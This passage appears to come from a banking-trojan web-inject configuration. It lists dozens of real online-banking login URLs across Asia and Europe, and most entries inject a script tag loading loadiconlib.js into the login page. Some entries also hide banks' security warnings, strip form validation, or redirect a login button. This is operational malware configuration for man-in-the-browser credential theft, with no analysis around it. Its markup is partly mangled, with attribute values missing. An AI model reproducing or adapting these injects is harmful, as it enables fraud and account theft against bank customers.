  836. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  837. ]></replacement></modify></actions></httpinject><httpinject
  838. <conditions
  839. <url
  840. type
  841. "allow
  842. onpost
  843. onget
  844. modifiers
  845. >^https://www\.hsbc\.com\.cn/1/2/.+
  846. /url></conditions><actions
  847. <modify
  848. <pattern
  849. modifiers
  850. "sAi
  851. ><![CDATA[(.+</body>)
  852. ]></pattern><replacement
  853. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  854. ]></replacement></modify></actions></httpinject><httpinject
  855. <conditions
  856. <url
  857. type
  858. "allow
  859. onpost
  860. onget
  861. modifiers
  862. >^https://www\.hsbc\.com\.sg/1/2/.+
  863. /url></conditions><actions
  864. <modify
  865. <pattern
  866. modifiers
  867. "sAi
  868. ><![CDATA[(.+</body>)
  869. ]></pattern><replacement
  870. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  871. ]></replacement></modify></actions></httpinject><httpinject
  872. <conditions
  873. <url
  874. type
  875. "allow
  876. onpost
  877. onget
  878. modifiers
  879. >^https://www\.hsbc\.com\.vn/1/2/
  880. /url></conditions><actions
  881. <modify
  882. <pattern
  883. modifiers
  884. ><![CDATA[(</form>)
  885. ]></pattern><replacement
  886. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  887. ]></replacement></modify></actions></httpinject><httpinject
  888. <conditions
  889. <url
  890. type
  891. "allow
  892. onpost
  893. onget
  894. modifiers
  895. >^https://ebusiness\.hangseng\.com/1/2/
  896. /url></conditions><actions
  897. <modify
  898. <pattern
  899. modifiers
  900. "sAi
  901. ><![CDATA[(.+</form>)
  902. ]></pattern><replacement
  903. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  904. ]></replacement></modify></actions></httpinject><httpinject
  905. <conditions
  906. <url
  907. type
  908. "allow
  909. onpost
  910. onget
  911. modifiers
  912. >^https://ebank\.eonbank\.com\.my/cashmgmt/security/commonLogin\.jsp($|\?)
  913. /url></conditions><actions
  914. <modify
  915. <pattern
  916. modifiers
  917. ><![CDATA[(</form>)
  918. ]></pattern><replacement
  919. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  920. ]></replacement></modify></actions></httpinject><httpinject
  921. <conditions
  922. <url
  923. type
  924. "allow
  925. onpost
  926. onget
  927. modifiers
  928. >^https://www\.hongleongonline\.com\.my/business/public/main\.html
  929. /url></conditions><actions
  930. <modify
  931. <pattern
  932. modifiers
  933. ><![CDATA[(</form>)
  934. ]></pattern><replacement
  935. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  936. ]></replacement></modify></actions></httpinject><httpinject
  937. <conditions
  938. <url
  939. type
  940. "allow
  941. onpost
  942. onget
  943. modifiers
  944. >^https://ibps\.hpb\.hr/HPB\.iBank\.IBPS\.Web/login\.iface
  945. /url></conditions><actions
  946. <modify
  947. <pattern
  948. modifiers
  949. ><![CDATA[(</form>)
  950. ]></pattern><replacement
  951. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  952. ]></replacement></modify></actions></httpinject><httpinject
  953. <conditions
  954. <url
  955. type
  956. "allow
  957. onpost
  958. onget
  959. modifiers
  960. >^https://ibank\.hncb\.com\.hk/netbank/pages/jsp/HKLogin/html/HKLogin\_en\.jsp(\?|$)
  961. /url></conditions><actions
  962. <modify
  963. <pattern
  964. modifiers
  965. ><![CDATA[(.+</form>)
  966. ]></pattern><replacement
  967. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  968. ]></replacement></modify></actions></httpinject><httpinject
  969. <conditions
  970. <url
  971. type
  972. "allow
  973. onpost
  974. onget
  975. modifiers
  976. >^https://cib\.icicibank\.com\.sg/CIBSGAPP/BANKAWAY(\?|$)
  977. /url></conditions><actions
  978. <modify
  979. <pattern
  980. modifiers
  981. ><![CDATA[(.+</form>)
  982. ]></pattern><replacement
  983. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  984. ]></replacement></modify></actions></httpinject><httpinject
  985. <conditions
  986. <url
  987. type
  988. "allow
  989. onpost
  990. onget
  991. modifiers
  992. >^https://(corpebankasia|corpebank)\.icbc\.com\.cn/icbc/corporbank/index.*\.jsp(\?|$)
  993. /url></conditions><actions
  994. <modify
  995. <pattern
  996. modifiers
  997. "isA
  998. ><![CDATA[(.+</form>)
  999. ]></pattern><replacement
  1000. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1001. ]></replacement></modify></actions></httpinject><httpinject
  1002. <conditions
  1003. <url
  1004. type
  1005. "allow
  1006. onpost
  1007. onget
  1008. modifiers
  1009. >^https://ebank\.kasikornbankgroup\.com/kbiznet/login.*\.html
  1010. /url></conditions><actions
  1011. <modify
  1012. <pattern
  1013. modifiers
  1014. ><![CDATA[(</form>)
  1015. ]></pattern><replacement
  1016. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1017. ]></replacement></modify></actions></httpinject><httpinject
  1018. <conditions
  1019. <url
  1020. type
  1021. "allow
  1022. onpost
  1023. onget
  1024. modifiers
  1025. >^https://ws\d+\.kasikornbank\.com/baliweb/\d+/site/defaultskin/.*/html/static/logon\.htm
  1026. /url></conditions><actions
  1027. <modify
  1028. <pattern
  1029. modifiers
  1030. ><![CDATA[(</body>)
  1031. ]></pattern><replacement
  1032. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  1033. ]></replacement></modify></actions></httpinject><httpinject
  1034. <conditions
  1035. <url
  1036. type
  1037. "allow
  1038. onpost
  1039. onget
  1040. modifiers
  1041. >^https://www\.kbc\.be/
  1042. /url></conditions><actions
  1043. <modify
  1044. <pattern
  1045. modifiers
  1046. "isU
  1047. ><![CDATA[(<form.*id="ID_LOGONFORM".*</form>)
  1048. ]></pattern><replacement
  1049. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1050. ]></replacement></modify></actions></httpinject><httpinject
  1051. <conditions
  1052. <url
  1053. type
  1054. "allow
  1055. onpost
  1056. onget
  1057. modifiers
  1058. >^https://vpn\.tarumanagara\.com/\+CSCOE\+/logon\.html
  1059. /url></conditions><actions
  1060. <modify
  1061. <pattern
  1062. modifiers
  1063. ><![CDATA[(</form>)
  1064. ]></pattern><replacement
  1065. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1066. ]></replacement></modify></actions></httpinject><httpinject
  1067. <conditions
  1068. <url
  1069. type
  1070. "allow
  1071. onpost
  1072. onget
  1073. modifiers
  1074. >^https://singapore\.lbbw\-business\.com/LBBWCorpWeb/login/.+\.action(\?|$)
  1075. /url></conditions><actions
  1076. <modify
  1077. <pattern
  1078. modifiers
  1079. ><![CDATA[(</form>)
  1080. ]></pattern><replacement
  1081. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1082. ]></replacement></modify></actions></httpinject><httpinject
  1083. <conditions
  1084. <url
  1085. type
  1086. "allow
  1087. onpost
  1088. onget
  1089. modifiers
  1090. >^https://mcm\.bankmandiri\.co\.id/corp/common/login\.do\?action=login
  1091. /url></conditions><actions
  1092. <modify
  1093. <pattern
  1094. modifiers
  1095. ><![CDATA[(</form>)
  1096. ]></pattern><replacement
  1097. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1098. ]></replacement></modify></actions></httpinject><httpinject
  1099. <conditions
  1100. <url
  1101. type
  1102. "allow
  1103. onpost
  1104. onget
  1105. modifiers
  1106. >^https://mib\.bankmandiri\.co\.id/sme/common/login\.do\?action=login
  1107. /url></conditions><actions
  1108. <modify
  1109. <pattern
  1110. modifiers
  1111. ><![CDATA[(</form>)
  1112. ]></pattern><replacement
  1113. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1114. ]></replacement></modify></actions></httpinject><httpinject
  1115. <conditions
  1116. <url
  1117. type
  1118. "allow
  1119. onpost
  1120. onget
  1121. modifiers
  1122. >^https://www\.maybank2u\.com\.my/mbb/m2u/common/mbbLoginCheckAdapt\.do
  1123. /url></conditions><actions
  1124. <modify
  1125. <pattern
  1126. modifiers
  1127. ><![CDATA[(</html>)
  1128. ]></pattern><replacement
  1129. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1130. ]></replacement></modify></actions></httpinject><httpinject
  1131. <conditions
  1132. <url
  1133. type
  1134. "allow
  1135. onpost
  1136. onget
  1137. modifiers
  1138. >^https://www\.maybank2u\.com\.my/mbb/m2uNOW/common/mbbLoginCheckAdapt\.do
  1139. /url></conditions><actions
  1140. <modify
  1141. <pattern
  1142. modifiers
  1143. ><![CDATA[(</html>)
  1144. ]></pattern><replacement
  1145. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1146. ]></replacement></modify></actions></httpinject><httpinject
  1147. <conditions
  1148. <url
  1149. type
  1150. "allow
  1151. onpost
  1152. onget
  1153. modifiers
  1154. >^https://sslsecure\.maybank\.com\.sg/cgi\-bin/mbs/scripts/mbb\_login\.jsp(\?|$)
  1155. /url></conditions><actions
  1156. <modify
  1157. <pattern
  1158. modifiers
  1159. ><![CDATA[(.+</form>)
  1160. ]></pattern><replacement
  1161. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1162. ]></replacement></modify></actions></httpinject><httpinject
  1163. <conditions
  1164. <url
  1165. type
  1166. "allow
  1167. onpost
  1168. onget
  1169. modifiers
  1170. >^https://www\.maybank2e\.net/M2E/mbbcustomer/
  1171. /url></conditions><actions
  1172. <modify
  1173. <pattern
  1174. modifiers
  1175. ><![CDATA[(</form>)
  1176. ]></pattern><replacement
  1177. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1178. ]></replacement></modify></actions></httpinject><httpinject
  1179. <conditions
  1180. <url
  1181. type
  1182. "allow
  1183. onpost
  1184. onget
  1185. modifiers
  1186. >^https://cbs\.ncbchina\.cn/corporbank/login\_basic\_e\.jsp(\?|$)
  1187. /url></conditions><actions
  1188. <modify
  1189. <pattern
  1190. modifiers
  1191. ><![CDATA[(.+</form>)
  1192. ]></pattern><replacement
  1193. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1194. ]></replacement></modify></actions></httpinject><httpinject
  1195. <conditions
  1196. <url
  1197. type
  1198. "allow
  1199. onpost
  1200. onget
  1201. modifiers
  1202. >^https://bbmy\.ocbc\.com
  1203. /url></conditions><actions
  1204. <modify
  1205. <pattern
  1206. modifiers
  1207. ><![CDATA[(</form>)
  1208. ]></pattern><replacement
  1209. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1210. ]></replacement></modify></actions></httpinject><httpinject
  1211. <conditions
  1212. <url
  1213. type
  1214. "allow
  1215. onpost
  1216. onget
  1217. modifiers
  1218. >^https://elementa\.otpbanka\.hr/gradjani/.*/foweb/nb/eLEMENTa
  1219. /url></conditions><actions
  1220. <modify
  1221. <pattern
  1222. modifiers
  1223. ><![CDATA[(</form>)
  1224. ]></pattern><replacement
  1225. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1226. ]></replacement></modify></actions></httpinject><httpinject
  1227. <conditions
  1228. <url
  1229. type
  1230. "allow
  1231. onpost
  1232. onget
  1233. modifiers
  1234. >^https://www\.otpbanka\.hr/english/welcome\.htm
  1235. /url><url
  1236. type
  1237. "allow
  1238. onpost
  1239. onget
  1240. modifiers
  1241. >^https://www\.otpbanka\.hr/html/dobrodosli\.htm
  1242. /url></conditions><actions
  1243. <modify
  1244. <pattern
  1245. modifiers
  1246. ><![CDATA[onclick="provjera_fp
  1247. ]></pattern><replacement
  1248. <![CDATA[onclick="window.location.href='https://elementa.otpbanka.hr/gradjani/OTP-gradjani.exe/foweb/nb/eLEMENTa';return false;this.focus
  1249. ]></replacement></modify></actions></httpinject><httpinject
  1250. <conditions
  1251. <url
  1252. type
  1253. "allow
  1254. onpost
  1255. onget
  1256. modifiers
  1257. >^https://net\.pbz\.hr/pbz365/logon.*
  1258. /url></conditions><actions
  1259. <modify
  1260. <pattern
  1261. modifiers
  1262. ><![CDATA[(</html>)
  1263. ]></pattern><replacement
  1264. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1265. ]></replacement></modify></actions></httpinject><httpinject
  1266. <conditions
  1267. <url
  1268. type
  1269. "allow
  1270. onpost
  1271. onget
  1272. modifiers
  1273. >^https://comnet\.pbz\.hr/PbzComnetWeb/app/logon\.html
  1274. /url></conditions><actions
  1275. <modify
  1276. <pattern
  1277. modifiers
  1278. ><![CDATA[(</form>)
  1279. ]></pattern><replacement
  1280. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1281. ]></replacement></modify></actions></httpinject><httpinject
  1282. <conditions
  1283. <url
  1284. type
  1285. "allow
  1286. onpost
  1287. onget
  1288. modifiers
  1289. >^https://www\.permatae\-business\.com/corp/common/login\.do\?action=login
  1290. /url></conditions><actions
  1291. <modify
  1292. <pattern
  1293. modifiers
  1294. ><![CDATA[(</form>)
  1295. ]></pattern><replacement
  1296. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1297. ]></replacement></modify></actions></httpinject><httpinject
  1298. <conditions
  1299. <url
  1300. type
  1301. "allow
  1302. onpost
  1303. onget
  1304. modifiers
  1305. >^https://e\-finance\.postfinance\.ch/(ef/secure|secure/fp)/html/
  1306. /url><!----></conditions><actions
  1307. <modify
  1308. <pattern
  1309. modifiers
  1310. ><![CDATA[(</form>)
  1311. ]></pattern><replacement
  1312. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1313. ]></replacement></modify></actions></httpinject><httpinject
  1314. <conditions
  1315. <url
  1316. type
  1317. "allow
  1318. onpost
  1319. onget
  1320. modifiers
  1321. >^https://direkt\.rba\.hr/cgi\-bin/ppz2/start/rbat\.jsp
  1322. /url></conditions><actions
  1323. <modify
  1324. <pattern
  1325. modifiers
  1326. ><![CDATA[(</form>)
  1327. ]></pattern><replacement
  1328. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1329. ]></replacement></modify></actions></httpinject><httpinject
  1330. <conditions
  1331. <url
  1332. type
  1333. "allow
  1334. onpost
  1335. onget
  1336. modifiers
  1337. >^https://access\.rbsm\.com/logon/(password|dp300)/.+\.fcc(\?|$)
  1338. /url></conditions><actions
  1339. <modify
  1340. <pattern
  1341. modifiers
  1342. ><![CDATA[(</form>)
  1343. ]></pattern><replacement
  1344. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1345. ]></replacement></modify></actions></httpinject><httpinject
  1346. <conditions
  1347. <url
  1348. type
  1349. "allow
  1350. onpost
  1351. onget
  1352. modifiers
  1353. >^https://logon\.reflex\.rhbbank\.com\.my/rhbcams/corporate/login\.jsp
  1354. /url></conditions><actions
  1355. <modify
  1356. <pattern
  1357. modifiers
  1358. ><![CDATA[(</form>)
  1359. ]></pattern><replacement
  1360. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1361. ]></replacement></modify></actions></httpinject><httpinject
  1362. <conditions
  1363. <url
  1364. type
  1365. "allow
  1366. onpost
  1367. onget
  1368. modifiers
  1369. >^https://www\.sbnet\.splitskabanka\.hr/priv/.*/dciweb\.htm
  1370. /url></conditions><actions
  1371. <modify
  1372. <pattern
  1373. modifiers
  1374. ><![CDATA[(</form>)
  1375. ]></pattern><replacement
  1376. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1377. ]></replacement></modify></actions></httpinject><httpinject
  1378. <conditions
  1379. <url
  1380. type
  1381. "allow
  1382. onpost
  1383. onget
  1384. modifiers
  1385. >^https://mcsign\.ba\-ca\.com/smartoffice/\_mcologon\?\.\.OASLogon
  1386. /url></conditions><actions
  1387. <modify
  1388. <pattern
  1389. modifiers
  1390. ><![CDATA[(</form>)
  1391. ]></pattern><replacement
  1392. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1393. ]></replacement></modify></actions></httpinject><httpinject
  1394. <conditions
  1395. <url
  1396. type
  1397. "allow
  1398. onpost
  1399. onget
  1400. modifiers
  1401. >^https://s2b\.standardchartered\.com/ssoapp/(login\.jsp|core\.security\.login\.event)
  1402. /url></conditions><actions
  1403. <modify
  1404. <pattern
  1405. modifiers
  1406. ><![CDATA[(</form>)
  1407. ]></pattern><replacement
  1408. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1409. ]></replacement></modify><modify
  1410. <pattern
  1411. modifiers
  1412. ><![CDATA[div class="scbLoginImpContainer01"
  1413. ]></pattern><replacement
  1414. <![CDATA[div class="scbLoginImpContainer01" style="display:none;"
  1415. ]></replacement></modify></actions></httpinject><httpinject
  1416. <conditions
  1417. <url
  1418. type
  1419. "allow
  1420. onpost
  1421. onget
  1422. modifiers
  1423. >^https://sme\.standardchartered\.com/commonapp/core\.security\.vascochallenge\.event
  1424. /url></conditions><actions
  1425. <modify
  1426. <pattern
  1427. modifiers
  1428. ><![CDATA[(</form>)
  1429. ]></pattern><replacement
  1430. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1431. ]></replacement></modify></actions></httpinject><httpinject
  1432. <conditions
  1433. <url
  1434. type
  1435. "allow
  1436. onpost
  1437. onget
  1438. modifiers
  1439. >^https://ibank\.standardchartered\.com\.hk/nfs/login\.htm(\?|$)
  1440. /url></conditions><actions
  1441. <modify
  1442. <pattern
  1443. modifiers
  1444. ><![CDATA[(.+</form>)
  1445. ]></pattern><replacement
  1446. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1447. ]></replacement></modify></actions></httpinject><httpinject
  1448. <conditions
  1449. <url
  1450. type
  1451. "allow
  1452. onpost
  1453. onget
  1454. modifiers
  1455. >^https://ibank\.standardchartered\.com\.sg/nfs/login\.htm(\?|$)
  1456. /url></conditions><actions
  1457. <modify
  1458. <pattern
  1459. modifiers
  1460. ><![CDATA[(.+</form>)
  1461. ]></pattern><replacement
  1462. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1463. ]></replacement></modify></actions></httpinject><httpinject
  1464. <conditions
  1465. <url
  1466. type
  1467. "allow
  1468. onpost
  1469. onget
  1470. modifiers
  1471. >^https://www\.onlinesbiglobal\.com/\S+/BANKAWAY($|\?|\;)
  1472. /url></conditions><actions
  1473. <modify
  1474. <pattern
  1475. modifiers
  1476. ><![CDATA[(</form>)
  1477. ]></pattern><replacement
  1478. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1479. ]></replacement></modify></actions></httpinject><httpinject
  1480. <conditions
  1481. <url
  1482. type
  1483. "allow
  1484. onpost
  1485. onget
  1486. modifiers
  1487. >^https://ebanking\-ch\d+\.ubs\.com/workbench/Index\.do
  1488. /url></conditions><actions
  1489. <modify
  1490. <pattern
  1491. modifiers
  1492. ><![CDATA[(</html>)
  1493. ]></pattern><replacement
  1494. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1495. <!--
  1496. <script type="text/javascript" language="JavaScript">
  1497. setTimeout(function() {
  1498. document.body.style.visibility = 'visible';
  1499. }, 7000);
  1500. </script>
  1501. -->
  1502.  
  1503. ]></replacement></modify><modify
  1504. <pattern
  1505. modifiers
  1506. ><![CDATA[(div id="div_securityinfo_content")
  1507. ]></pattern><replacement
  1508. <![CDATA[\1 style="visibility:hidden;"
  1509. ]></replacement></modify></actions></httpinject><httpinject
  1510. <conditions
  1511. <url
  1512. type
  1513. "allow
  1514. onpost
  1515. onget
  1516. modifiers
  1517. >^https://www\.ucoebanking\.com/BankAwayRetail/.*/web/L001/retail/jsp/user/CorporateSignOn\.aspx(\?|$)
  1518. /url></conditions><actions
  1519. <modify
  1520. <pattern
  1521. modifiers
  1522. "isA
  1523. ><![CDATA[(.+</form>)
  1524. ]></pattern><replacement
  1525. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1526. ]></replacement></modify></actions></httpinject><httpinject
  1527. <conditions
  1528. <url
  1529. type
  1530. "allow
  1531. onpost
  1532. onget
  1533. modifiers
  1534. >^https://uniservices\d*\.uobgroup\.com/(ELO/login\.jsp|wpe/ca/login\.do|wpe/ca/loginForm\.jsp)(\;|\?|$)
  1535. /url></conditions><actions
  1536. <modify
  1537. <pattern
  1538. modifiers
  1539. ><![CDATA[(</form>)
  1540. ]></pattern><replacement
  1541. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1542. ]></replacement></modify></actions></httpinject><httpinject
  1543. <conditions
  1544. <url
  1545. type
  1546. "allow
  1547. onpost
  1548. onget
  1549. modifiers
  1550. >^https://biz\.uob\.com\.my/ELO/login\.jsp
  1551. /url></conditions><actions
  1552. <modify
  1553. <pattern
  1554. modifiers
  1555. ><![CDATA[(</html>)
  1556. ]></pattern><replacement
  1557. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1558. ]></replacement></modify></actions></httpinject><httpinject
  1559. <conditions
  1560. <url
  1561. type
  1562. "allow
  1563. onpost
  1564. onget
  1565. modifiers
  1566. >^https://www\.vietcombank\.com\.vn/ibanking/Default\.aspx
  1567. /url></conditions><actions
  1568. <modify
  1569. <pattern
  1570. modifiers
  1571. ><![CDATA[(</form>)
  1572. ]></pattern><replacement
  1573. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1574. ]></replacement></modify><modify
  1575. <pattern
  1576. modifiers
  1577. ><![CDATA[color: Red; font\-weight: bold;
  1578. ]></pattern><replacement
  1579. <![CDATA[color: Red; font-weight: bold; display:none;
  1580. ]></replacement></modify></actions></httpinject><httpinject
  1581. <conditions
  1582. <url
  1583. type
  1584. "allow
  1585. onpost
  1586. onget
  1587. modifiers
  1588. >^https://www\.vietinbank\.vn/ipay/vbh/login\.do
  1589. /url></conditions><actions
  1590. <modify
  1591. <pattern
  1592. modifiers
  1593. ><![CDATA[(</form>)
  1594. ]></pattern><replacement
  1595. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1596. ]></replacement></modify><modify
  1597. <pattern
  1598. modifiers
  1599. "isU
  1600. ><![CDATA[\$\("#login"\)\.validationEngine \(\{.*\}\);
  1601. ]></pattern><replacement
  1602. <![CDATA[
  1603. ]></replacement></modify></actions></httpinject><httpinject
  1604. <conditions
  1605. <url
  1606. type
  1607. "allow
  1608. onpost
  1609. onget
  1610. modifiers
  1611. >^https://www\.winglungbank\.com/corpbanking/logon/CbHomLogonInp\.jsp(\?|$)
  1612. /url></conditions><actions
  1613. <modify
  1614. <pattern
  1615. modifiers
  1616. "isA
  1617. ><![CDATA[(.+</form>)
  1618. ]></pattern><replacement
  1619. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1620. ]></replacement></modify></actions></httpinject><httpinject
  1621. <conditions
  1622. <url
  1623. type
  1624. "allow
  1625. onpost
  1626. onget
  1627. modifiers
  1628. >^https://www\.zaba\.hr/ebank/gradjani/InnerLogin\.jsp
  1629. /url></conditions><actions
  1630. <modify
  1631. <pattern
  1632. modifiers
  1633. ><![CDATA[(</form>)
  1634. ]></pattern><replacement
  1635. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1636. ]></replacement></modify></actions></httpinject><httpinject
  1637. <conditions
  1638. <url
  1639. type
  1640. "allow
  1641. onpost
  1642. onget
  1643. modifiers
  1644. >^https://www\.irakyat\.com\.my/retail/security/commonLogin\.jsp
  1645. /url></conditions><actions
  1646. <modify
  1647. <pattern
  1648. modifiers
  1649. ><![CDATA[(</html>)
  1650. ]></pattern><replacement
  1651. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1652. ]></replacement></modify></actions></httpinject><httpinject
  1653. <conditions
  1654. <url
  1655. type
  1656. "allow
  1657. onpost
  1658. onget
  1659. modifiers
  1660. >^https://www\.mybsn\.com\.my/mybsn/login/login\.do
  1661. /url></conditions><actions
  1662. <modify
  1663. <pattern
  1664. modifiers
  1665. ><![CDATA[(</form>)
  1666. ]></pattern><replacement
  1667. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1668. ]></replacement></modify></actions></httpinject><httpinject
  1669. <conditions
  1670. <url
  1671. type
  1672. "allow
  1673. onpost
  1674. onget
  1675. modifiers
  1676. >^https://ibank\.bni\.co\.id/corp/AuthenticationController
  1677. /url></conditions><actions
  1678. <modify
  1679. <pattern
  1680. modifiers
  1681. ><![CDATA[(</form>)
  1682. ]></pattern><replacement
  1683. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="ibank/scripts/loadiconlib.js"></script>
  1684. ]></replacement></modify></actions></httpinject><httpinject
  1685. <conditions
  1686. <url
  1687. type
  1688. "allow
  1689. onpost
  1690. onget
  1691. modifiers
  1692. >^https://ib\.bri\.co\.id/ib\-bri/Login\.html
  1693. /url></conditions><actions
  1694. <modify
  1695. <pattern
  1696. modifiers
  1697. ><![CDATA[(</html>)
  1698. ]></pattern><replacement
  1699. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1700. ]></replacement></modify></actions></httpinject><httpinject
  1701. <conditions
  1702. <url
  1703. type
  1704. "allow
  1705. onpost
  1706. onget
  1707. modifiers
  1708. >^https://ib\.bankmandiri\.co\.id/retail/Login\.do
  1709. /url></conditions><actions
  1710. <modify
  1711. <pattern
  1712. modifiers
  1713. ><![CDATA[(</form>)
  1714. ]></pattern><replacement
  1715. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1716. ]></replacement></modify></actions></httpinject><httpinject
  1717. <conditions
  1718. <url
  1719. type
  1720. "allow
  1721. onpost
  1722. onget
  1723. modifiers
  1724. >^https://www\.danamonline\.com/onlinebanking/Login/lgn_new\.aspx
  1725. /url></conditions><actions
  1726. <modify
  1727. <pattern
  1728. modifiers
  1729. ><![CDATA[(</html>)
  1730. ]></pattern><replacement
  1731. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1732. ]></replacement></modify></actions></httpinject><httpinject
  1733. <conditions
  1734. <url
  1735. type
  1736. "allow
  1737. onpost
  1738. onget
  1739. modifiers
  1740. >^https://ibank\.klikbca\.com
  1741. /url></conditions><actions
  1742. <modify
  1743. <pattern
  1744. modifiers
  1745. ><![CDATA[(</html>)
  1746. ]></pattern><replacement
  1747. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1748. ]></replacement></modify></actions></httpinject><httpinject
  1749. <conditions
  1750. <url
  1751. type
  1752. "allow
  1753. onpost
  1754. onget
  1755. modifiers
  1756. >^https://www\.hsbc\.co\.uk/1/2/
  1757. /url></conditions><actions
  1758. <modify
  1759. <pattern
  1760. modifiers
  1761. "msU
  1762. ><![CDATA[(</form>)
  1763. ]></pattern><replacement
  1764. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1765. ]></replacement></modify></actions></httpinject><httpinject
  1766. <conditions
  1767. <url
  1768. type
  1769. "allow
  1770. onpost
  1771. onget
  1772. modifiers
  1773. >^https://bank\.barclays\.co\.uk/olb/auth/LoginLink\.action
  1774. /url></conditions><actions
  1775. <modify
  1776. <pattern
  1777. modifiers
  1778. ><![CDATA[(</body>)
  1779. ]></pattern><replacement
  1780. <![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>\1
  1781. ]></replacement></modify></actions></httpinject><httpinject
  1782. <conditions
  1783. <url
  1784. type
  1785. "allow
  1786. onpost
  1787. onget
  1788. modifiers
  1789. >^https://secure\.cafbank\.org
  1790. /url></conditions><actions
  1791. <modify
  1792. <pattern
  1793. modifiers
  1794. ><![CDATA[(</form>)
  1795. ]></pattern><replacement
  1796. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1797. ]></replacement></modify></actions></httpinject><httpinject
  1798. <conditions
  1799. <url
  1800. type
  1801. "allow
  1802. onpost
  1803. onget
  1804. modifiers
  1805. >^https://cardsonline\-commercial\.com/RBSG\_Commercial/.*Login\.do
  1806. /url></conditions><actions
  1807. <modify
  1808. <pattern
  1809. modifiers
  1810. ><![CDATA[(</htQQQQQml>)
  1811. ]></pattern><replacement
  1812. <![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/loadiconlib.js"></script>
  1813. ]></replacement></modify></actions></httpinject><httpinject
  1814. <conditions
  1815. <url
  1816. type
  1817. "allow
  1818. onpost
  1819. onget
  1820. modifiers
  1821. >^https://.*/fi\d+/bb/logon
  1822. /url></conditions><actions
  1823. <modify
  1824. <pattern
  1825. modifiers
  1826. "imsU
